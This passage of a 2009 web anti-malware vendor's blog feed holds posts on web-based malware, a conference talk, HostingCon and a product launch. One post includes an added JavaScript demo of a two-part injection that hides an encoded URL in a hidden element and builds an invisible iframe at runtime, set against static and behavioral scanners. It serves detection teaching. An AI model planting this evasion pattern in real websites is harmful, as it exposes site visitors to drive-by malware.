As we've mentioned before in this space, &lt;/span&gt;&lt;a id="zd:h" href="http://blog.dasient.com/2009/06/introducing-dasient-web-anti-malware.html" title="millions" style="color: rgb(85, 26, 139); "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;millions&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; of legitimate webpages are infected with web-based malware every month, and the size of the &lt;/span&gt;&lt;a id="l6bs" href="http://blog.dasient.com/2009/07/how-does-web-page-harm-thee-let-me.html" title="blacklists"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;blacklists&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; maintained by search engines, browsers, and AV providers &lt;/span&gt;&lt;a id="t68-" href="http://blog.dasient.com/2009/05/web-based-malware-attacks-at-all-time.html" title="continues to grow" style="color: rgb(85, 26, 139); "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;continues to grow&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;.&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Another issue the announcement raises is how difficult it can be for businesses whose sites have been infected to locate the source of the infections and address them (especially since the malicious code is sometimes &lt;/span&gt;&lt;a id="rdiq" href="http://blog.dasient.com/2009/09/dasient-details-new-attack-cyber.html" 
title="heavily obscured" style="color: rgb(85, 26, 139); "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;heavily obscured&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;). And since businesses often don't discover these infections until their sites have been blacklisted, they're taking a hit in traffic, revenue, and reputation with every hour that passes as they try to solve the problem. &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;We've helped tens of thousands of site owners deal with web-based malware infections in the last eight months -- providing not just snippets, but also full, regular site scans, immediate infection alerts, and automatic remediation tools -- and we've seen firsthand how frustrating these infections can be for them, and how helpful services like Dasient WAM can be.&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;If you're concerned about web-based malware infections and the impact they can have on your business, sign up for Dasient's &lt;/span&gt;&lt;a id="j.j_" href="http://wam.dasient.com/wam/partner_monitor" title="monitoring service" style="color: rgb(85, 26, 139); "&gt;&lt;span style="background-color: rgb(255, 255, 255); "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;monitoring service&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="background-color: rgb(255, 255, 255); "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;, 
&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;which can identify infections and alert you before your site ends up on one of the blacklists. We also encourage you to try out our free, &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255); "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;a href="http://sourceforge.net/projects/modantimalware/"&gt;open-source server plugin&lt;/a&gt;, Mod Anti-Malware Lite, &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;which will automatically block any malicious code we detect from being served to users -- helping you keep those users safe and keep your site off the blacklists.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:'trebuchet ms', verdana, arial, sans-serif;color:#333333;"&gt;&lt;span class="Apple-style-span" style="border-collapse: collapse; font-size: medium; line-height: 18px; -webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-708370654571515279?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/708370654571515279/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/10/more-industry-attention-on-web-based.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/708370654571515279'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/708370654571515279'/><link rel='alternate' type='text/html' 
href='http://blog.dasient.com/2009/10/more-industry-attention-on-web-based.html' title='More industry attention on web-based malware'/><author><name>Neil Daswani</name><uri>http://www.blogger.com/profile/02845151886396994390</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='02016048081221183427'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-4429396960702620323</id><published>2009-09-28T15:53:00.001-07:00</published><updated>2009-09-28T16:34:37.666-07:00</updated><title type='text'>Dasient details new attack @ Cyber Security East</title><content type='html'>&lt;div&gt;&lt;span class="Apple-style-span"   style="  ;font-family:arial, sans-serif;font-size:-webkit-xxx-large;"&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 16px; "&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;Late last week I gave a talk at the &lt;/span&gt;&lt;a href="https://sites.google.com/a/cutline.com/cybersecurityeast/cybersecurity-east-conference/CyberSecurityEast.pdf?attredirects=0"&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;Cyber Security East Conference&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt; in Washington, DC. Some of the other speakers included Robert Lentz (Deputy Assistant Secretary of Defense), Dr. Eric Cole (Chief Scientist of Lockheed Martin), and Robert Carey (Chief Information Officer, Department of the Navy). 
There was a lot of interesting and useful discussion, and I was glad to be able to contribute to the event.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;In my talk, I reviewed the fundamental shift we've seen in the way malware is spreading, focusing on the 600% increase in web-based malware in the last two years. These attacks -- in which legitimate sites are compromised and turned into delivery vehicles for malware -- are impacting more than a million webpages per month, and in turn &lt;/span&gt;&lt;a href="http://blog.dasient.com/2009/07/how-does-web-page-harm-thee-let-me.html"&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;more and more&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt; legitimate sites are being blacklisted by major search engines, browsers, and AV companies.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;I also shared a few examples of how web-based malware attacks are growing more sophisticated, based on data we've gathered in the last year using our proprietary malware analysis platform. As you may know, some web-based malware attacks can be attributed to a single injection of an iFrame or JavaScript code snippet, with a relatively obvious malicious domain in the SRC of the iFrame. 
Others employ heavily obfuscated JavaScript that can often be hundreds of characters long, and as such can be more difficult to spot or remove from an infected site -- but they still use a single injection point.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;We are now starting to see attackers insert code via multiple injection points, to further obfuscate the bad code and make it more difficult for webmasters and traditional scans to detect. The screenshot below shows an &lt;/span&gt;&lt;a href="http://wam.dasient.com/wam/diagnose?URL=www.marfinsrl.com%2F&amp;amp;scan_id=27994"&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;example&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt; of this kind of attack that I presented last week:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_VTOwWLvbLPY/SsFHOXmhTBI/AAAAAAAACFE/vUEJWdNcsHw/s1600-h/screenshot092809.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 262px;" src="http://2.bp.blogspot.com/_VTOwWLvbLPY/SsFHOXmhTBI/AAAAAAAACFE/vUEJWdNcsHw/s320/screenshot092809.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5386664941491145746" /&gt;&lt;/a&gt;&lt;span class="Apple-style-span"  style="font-family:arial;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"   style="  ;font-family:Verdana;font-size:13px;"&gt;&lt;div style="margin-top: 0px; margin-bottom: 0px; "&gt;&lt;div&gt;&lt;span 
class="Apple-style-span"  style="font-family:arial, sans-serif;"&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Note that the attacker has injected JavaScript here, but it is not obfuscated, and it doesn't appear to point to a malicious domain. Hence, a scanner that simply checks SRC attributes or script text against a list of malicious domains may be fooled into treating the JavaScript as innocuous. The reality is quite different: the call to "getElementById" in the JavaScript reaches into another part of the document (where the first injection took place) to retrieve the encoded malicious domain and decode it. Only once the second injection has decoded the domain is it revealed as the source of a malicious iFrame.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;This new attack makes it clear that the purveyors of web-based malware are actively looking for ways around malware scans, and it underlines the importance of going above and beyond signature-based analysis in the battle against this threat. For example, the Dasient WAM malware-analysis platform was able to proactively capture this new multiple-injection attack in no small part because of its strengths in behavioral analysis. 
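&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;The following is an added example, not code from this post or from Dasient's platform. It models the two-injection attack described above, and the runtime-built SRC attributes and encoded URLs mentioned in the Q3'09 post, with a miniature DOM in JavaScript so that it runs under Node.js without a browser: a hidden element holds the attacker's URL reversed and percent-encoded, a second, unobfuscated script decodes it and inserts the iframe, and two scanners then inspect the page. The static scanner regex-matches src and href attributes and inline script text; the behavioral scanner instruments appendChild and executes the inline scripts. The hostnames (www.example.com, bad-example.invalid), the element id "analytics-google" and the page layout are all constructed for the demonstration.&lt;/span&gt;&lt;/div&gt;

```javascript
// Added example, not Dasient's code: a miniature DOM and two scanners that
// show why an iframe whose SRC is decoded at runtime from a second injection
// point slips past a static SRC-attribute check but not behavioral analysis.
// Every element, URL and payload string below is constructed for the demo;
// bad-example.invalid is a reserved name that never resolves.

class Element {
  constructor(tag, attrs, textContent) {
    this.tag = tag;
    this.attrs = attrs || {};
    this.textContent = textContent || '';
    this.children = [];
  }
  getAttribute(name) { return this.attrs[name]; }
  setAttribute(name, value) { this.attrs[name] = value; }
  appendChild(child) { this.children.push(child); return child; }
}

class Document {
  constructor() { this.body = new Element('body'); }
  createElement(tag) { return new Element(tag); }
  // Depth-first lookup by id; this is what the injected script leans on.
  getElementById(id) {
    const stack = [this.body];
    while (stack.length > 0) {
      const node = stack.pop();
      if (node.attrs.id === id) return node;
      for (const child of node.children) stack.push(child);
    }
    return null;
  }
  // Every element in document order, for the scanners.
  allElements() {
    const out = [];
    const walk = (node) => { out.push(node); node.children.forEach(walk); };
    walk(this.body);
    return out;
  }
}

// Injection 1: a hidden div with a reassuring id. Its text is the attacker's
// URL reversed and percent-encoded, so no "http://" ever appears in the page.
const HIDDEN_PAYLOAD = 'igc.ni%2Fdilavni.elpmaxe-dab%2F%2F%3Aptth';

// Injection 2: plain, unobfuscated JavaScript containing no domain at all.
// It reads the hidden div, decodes it, and only then builds the iframe.
const INJECTED_SCRIPT = [
  "var e = document.getElementById('analytics-google');",
  "var url = decodeURIComponent(e.textContent).split('').reverse().join('');",
  "var f = document.createElement('iframe');",
  "f.setAttribute('src', url);",
  "f.setAttribute('width', '1');",
  "f.setAttribute('height', '1');",
  "document.body.appendChild(f);",
].join('\n');

// Constructed page: one legitimate widget script, then the two injections.
function buildInfectedPage() {
  const doc = new Document();
  doc.body.appendChild(new Element('script', { src: 'http://www.example.com/widget.js' }));
  doc.body.appendChild(new Element('div',
    { id: 'analytics-google', style: 'display:none' }, HIDDEN_PAYLOAD));
  doc.body.appendChild(new Element('script', {}, INJECTED_SCRIPT));
  return doc;
}

// Static scan: a regex over src/href attributes and inline script text,
// i.e. the kind of check these attacks are built to evade. Returns hosts seen.
function staticScan(doc) {
  const hosts = new Set();
  const urlRe = /https?:\/\/([a-z0-9.-]+)/gi;
  for (const el of doc.allElements()) {
    for (const text of [el.attrs.src, el.attrs.href, el.textContent]) {
      if (typeof text !== 'string') continue;
      for (const m of text.matchAll(urlRe)) hosts.add(m[1].toLowerCase());
    }
  }
  return [...hosts].sort();
}

// Behavioral scan: hook appendChild, run the inline scripts, and record the
// src of every iframe the page actually inserts, resolved at runtime.
function behavioralScan(doc) {
  const inserted = [];
  const original = Element.prototype.appendChild;
  Element.prototype.appendChild = function (child) {
    if (child.tag === 'iframe') inserted.push(child.getAttribute('src'));
    return original.call(this, child);
  };
  try {
    for (const el of doc.allElements()) {
      if (el.tag !== 'script' || !el.textContent) continue;
      new Function('document', el.textContent)(doc);   // run inside the fake DOM
    }
  } finally {
    Element.prototype.appendChild = original;
  }
  return inserted;
}

console.log('static scan saw hosts:     ', staticScan(buildInfectedPage()));
console.log('behavioral scan saw iframe:', behavioralScan(buildInfectedPage()));
```

&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;The static scan reports only www.example.com; the behavioral scan reports the iframe pointing at bad-example.invalid, which exists only after the injected script has run. Hooking DOM insertion and executing the page is what a headless-browser sandbox does at scale, and it catches a SRC assembled from string fragments or decoded from another element just as readily as a literal one.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;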
We believe that as the web becomes more sophisticated and as attackers continue to embrace new, increasingly automated attack vectors, businesses on the web will need to deploy protections that work at web speed and web scale to keep themselves safe.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;To learn more about how Dasient WAM can help you protect your site, check out our &lt;/span&gt;&lt;a href="http://wam.dasient.com/wam/products"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;product overview&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;.&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div&gt;&lt;script&gt;&lt;/script&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-4429396960702620323?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/4429396960702620323/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/09/dasient-details-new-attack-cyber.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/4429396960702620323'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/4429396960702620323'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/09/dasient-details-new-attack-cyber.html' title='Dasient details new attack @ Cyber Security East'/><author><name>Neil 
Daswani</name><uri>http://www.blogger.com/profile/02845151886396994390</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='02016048081221183427'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VTOwWLvbLPY/SsFHOXmhTBI/AAAAAAAACFE/vUEJWdNcsHw/s72-c/screenshot092809.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-788938506081327414</id><published>2009-08-19T10:45:00.000-07:00</published><updated>2009-08-19T14:08:53.902-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HostingCon'/><title type='text'>Dasient @ HostingCon 2009</title><content type='html'>&lt;div&gt;Readers of this blog will know that the Dasient team was at HostingCon 2009 in Washington DC last week. The show was great -- busy, but very engaging. We had a booth in the exhibit hall, and hosted a party for some of the show's attendees. Neil gave a talk on the rising threat of web-based malware in the "Emerging Trends" track, and we launched &lt;a href="http://securitywatch.eweek.com/online_malware/open_source_web_anti-malware_tool_released.html"&gt;a new open source&lt;/a&gt; tool called Mod Anti-Malware Lite to help web hosts, site owners, and developers protect themselves. We were also named &lt;a  href="http://webhostblog.com/conferences/hostingcon-2009-conferences/hostingcon-2009-top-5-must-see-companies/"&gt;one of the five "must see" companies at the show&lt;/a&gt; by &lt;a href="http://www.webhostmagazine.com/"&gt;Web Host Magazine&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;But, without question, the most rewarding part of the experience was the opportunity to interact with so many people from the web hosting community. 
We learned a lot about the challenges that web hosts of all sizes are facing on the security front, and talked to several companies whose customers had been infected with web-based malware and / or blacklisted in recent months (one company had seen more than a quarter of its domains infected by Gumblar). We also got a lot of great feedback on &lt;a href="http://wam.dasient.com/wam/products"&gt;Dasient WAM&lt;/a&gt; and the ways it's helping hosts address these threats.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;For those of you we missed at the show, be sure to check out our new &lt;a href="http://wam.dasient.com/wam/partners"&gt;partner center&lt;/a&gt;, where you can sign your customer domains up for free blacklist monitoring, download Mod Anti-Malware Lite, and more. And for the rest of you, check out our pics from the event below!&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;img src="https://docs.google.com/a/dasient.com/File?id=dft4sphv_12gs8rtxg4_b" style="width: 160px; height: 213.333px;" /&gt;&lt;img src="https://docs.google.com/a/dasient.com/File?id=dft4sphv_13gzrfpkdh_b" style="width: 160px; height: 120px;" /&gt;&lt;img src="https://docs.google.com/a/dasient.com/File?id=dft4sphv_14fcpp4kdz_b" style="width: 160px; height: 213.333px;" /&gt;&lt;img src="https://docs.google.com/a/dasient.com/File?id=dft4sphv_15tjvhm382_b" style="width: 160px; height: 120px;" /&gt;&lt;img src="https://docs.google.com/a/dasient.com/File?id=dft4sphv_17g247tffx_b" style="width: 160px; height: 213.333px;" /&gt;&lt;img src="https://docs.google.com/a/dasient.com/File?id=dft4sphv_16fdfbcscr_b" style="width: 320px; height: 240px;" /&gt;&lt;img src="https://docs.google.com/a/dasient.com/File?id=dft4sphv_18df2tgncp_b" style="width: 320px; height: 240px;" /&gt;&lt;/div&gt;&lt;div&gt;&lt;br 
/&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-788938506081327414?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/788938506081327414/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/08/dasient-hostingcon-2009.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/788938506081327414'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/788938506081327414'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/08/dasient-hostingcon-2009.html' title='Dasient @ HostingCon 2009'/><author><name>Jeremy Hurwitz</name><uri>http://www.blogger.com/profile/11958290214185064988</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='07825380467852536649'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-6845420344607223000</id><published>2009-08-11T05:55:00.000-07:00</published><updated>2009-08-11T06:45:41.395-07:00</updated><title type='text'>Dasient launches Web Anti-Malware Lite</title><content type='html'>&lt;div&gt;The Dasient team is at &lt;a href="http://www.hostingcon.com/2009/"&gt;HostingCon 2009&lt;/a&gt; this week, and today we've made a few announcements that we're really excited about. 
Here's an excerpt from the release we put out this morning:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;blockquote&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;Dasient Releases Free Open-Source Web Anti-Malware Technology&lt;/b&gt;  &lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Test version of Dasient WAM remediation technology enables site owners and web hosts to keep their sites from infecting users in the event of a malware infection&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;i&gt;Dasient also launches partner center and announces new distribution partnerships with web hosting providers&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;WASHINGTON DC - August 11, 2009 - Today at HostingCon 2009, Dasient launched Mod Anti-Malware Lite, an open source version of its Web Anti-Malware (WAM) remediation technology. Mod Anti-Malware Lite is an Apache server module that will help site owners, web hosts, and developers protect themselves against the effects of web-based attacks that can compromise their sites and spread malware to their users. Mod Anti-Malware Lite will be made available today at &lt;a href="http://www.dasient.com/partners"&gt;www.dasient.com/partners&lt;/a&gt; and &lt;a href="https://sourceforge.net/projects/modantimalware/"&gt;www.sourceforge.net&lt;/a&gt;.  &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;"Every day, thousands of legitimate websites are infected with malicious code, and the speed, scale, and complexity of these attacks makes it difficult for website owners to identify and address the resulting infections," said Dr. Neil Daswani, one of Dasient's three co-founders. 
"Now more than ever it's important for site owners to deploy defenses that can operate at the scale and speed required to deal with the problem."&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;The most immediate result of web malware infection is blacklisting by search engines like Google and Yahoo; browsers like Internet Explorer, Firefox, and Chrome; and desktop anti-virus providers like Norton and McAfee. Using Dasient's Web Anti-Malware service can help sites stay off these blacklists, all of which can have a significant impact on site traffic, reputation, and revenue. Dasient WAM is the only web anti-malware service on the market that can monitor, automatically identify, and quarantine malware on websites before it can infect visitors and cause a loss of traffic, reputation, and revenue.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dasient is making Mod Anti-Malware Lite available as open source so that web hosts, site owners, and developers can test the Dasient WAM technology on their sites and explore different uses of the technology. When used in conjunction with the Dasient WAM monitoring and diagnostic service, the module will prevent any page that's been infected with malware from being served to users. 
Anyone who downloads and installs Mod Anti-Malware Lite will be granted a limited free trial of the Dasient WAM monitoring and diagnostic service, to be used in conjunction with the module.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Compared with the technology offered in Mod Anti-Malware Lite, the remediation technology in the premium service takes things a step further, removing any dangerous code but still serving the rest of the page to users, so site owners both protect their users from infection and stay open for business.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Also today, Dasient is launching a new partner center at &lt;a href="http://www.dasient.com/partners"&gt;www.dasient.com/partners&lt;/a&gt;. The partner center is designed to be a resource for web hosting providers, enabling them to quickly and easily sign their customer domains up for free blacklist monitoring, download Mod Anti-Malware Lite, and more. &lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dasient is also happy to announce new distribution partnerships with five web hosting providers: Consolidated, Vexxhost, Ultrahosting, and Nerds on Site in North America and Diadem Technologies in India. These partners will be integrating Dasient WAM into their product platforms in the coming months, selling the product to their customers and sharing revenue with Dasient.   &lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;  &lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;If you'd like to learn more about the Dasient WAM service, check out our &lt;a href="http://wam.dasient.com/wam/products"&gt;product overview&lt;/a&gt;. If you'd like to download Mod Anti-Malware Lite and get started right away, head over to the new &lt;a href="http://www.dasient.com/partners"&gt;partner center&lt;/a&gt;. 
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;And if you're at the show, be sure to catch the session by our own Neil Daswani at 4:00 pm today in the "Emerging Trends" track at the conference. Neil will be discussing the rising threat of web-based malware, and what web hosts of all sizes can do to protect themselves and their customers. Also be sure to swing by our booth for a demo of the Dasient WAM technology or to sign up for free blacklist monitoring in our new partner center. We're in &lt;a href="http://www.hostingcon.com/2009/attend/floorplan/"&gt;booth 312&lt;/a&gt; -- see you there!&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-6845420344607223000?l=blog.dasient.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.dasient.com/feeds/6845420344607223000/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.dasient.com/2009/08/dasient-launches-web-anti-malware-lite_11.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/6845420344607223000'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2338637496417622488/posts/default/6845420344607223000'/><link rel='alternate' type='text/html' href='http://blog.dasient.com/2009/08/dasient-launches-web-anti-malware-lite_11.html' title='Dasient launches Web Anti-Malware Lite'/><author><name>Michael</name><uri>http://www.blogger.com/profile/06404788338156661269</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' 
value='15599562183745378699'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2338637496417622488.post-7399650102846726268</id><published>2009-08-06T09:51:00.000-07:00</published><updated>2009-08-06T09:52:51.661-07:00</updated><title type='text'>Dasient Co-Founder Neil Daswani Gives Talk At Google</title><content type='html'>Last week, Neil was invited by Google engineer David Turner to give a talk at Google on "Mitigating Web-Based Malware Attacks."  In the talk, Neil discussed the problem of web-based malware, and the ways we can all work together as a community to address it. The full video of the talk has been posted on YouTube:&lt;br /&gt;&lt;br /&gt;&lt;object width="560" height="340"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ndEgEDRMKbs&amp;amp;hl=en&amp;amp;fs=1&amp;amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ndEgEDRMKbs&amp;amp;hl=en&amp;amp;fs=1&amp;amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Enjoy!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2338637496417622488-7399650102846726268?l=blog.dasient.com' alt='' 